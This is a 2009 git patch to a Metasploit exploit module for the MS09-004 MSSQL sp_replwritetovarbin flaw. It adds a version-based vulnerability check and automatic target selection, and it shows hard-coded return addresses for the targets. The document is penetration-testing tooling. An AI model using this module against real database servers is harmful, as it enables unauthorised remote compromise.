From e2a0ff92cefb39be5288970e1d5faaeec8fbb6dd Mon Sep 17 00:00:00 2001 From: Joshua Drake Date: Thu, 31 Dec 2009 16:26:32 +0000 Subject: [PATCH] add check and auto-target selection git-svn-id: file:///home/svn/framework3/trunk@8048 4d416f70-5f16-0410-b530-b9f4589650da --- .../mssql/ms09_004_sp_replwritetovarbin.rb | 37 +++++++++++++++++-- 1 file changed, 34 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb index 0eae670d5b..fc882db333 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote # Individual targets # [ - 'MSSQL 2000 / MSDE <= SP2', + 'MSSQL 2000 / MSDE', { 'Writable' => 0x42b6cfe0, 'Ret' => 0x42b6be7b @@ -76,12 +76,43 @@ class Metasploit3 < Msf::Exploit::Remote )) end + def check + info = mssql_ping + if (info and info.has_key?('Version')) + + # TODO: better detection + if (info['Version'] =~ /8\.00\.194/) + return Exploit::CheckCode::Vulnerable + end + + # dump the discovered info and return that we detected MSSQL + info.each_pair { |k,v| + print_status(" #{k + (" " * (15-k.length))} = #{v}") + } + return Exploit::CheckCode::Detected + end + return Exploit::CheckCode::Safe + end + def exploit mytarget = nil if target.name =~ /Automatic/ - # nothing yet... - mytarget = targets[1] + print_status("Attempting automatic target detection...") + info = mssql_ping + if (info and info.has_key?('Version')) + if (info['Version'] =~ /8\.00\./) + mytarget = targets[1] + elsif (info['Version'] =~ /9\.00\./) + mytarget = targets[2] + end + end + + if mytarget.nil? + raise RuntimeError, "Unable to automatically detect the target" + else + print_status("Automatically detected target \"#{mytarget.name}\" from version \"#{info['Version']}\"") + end else mytarget = target end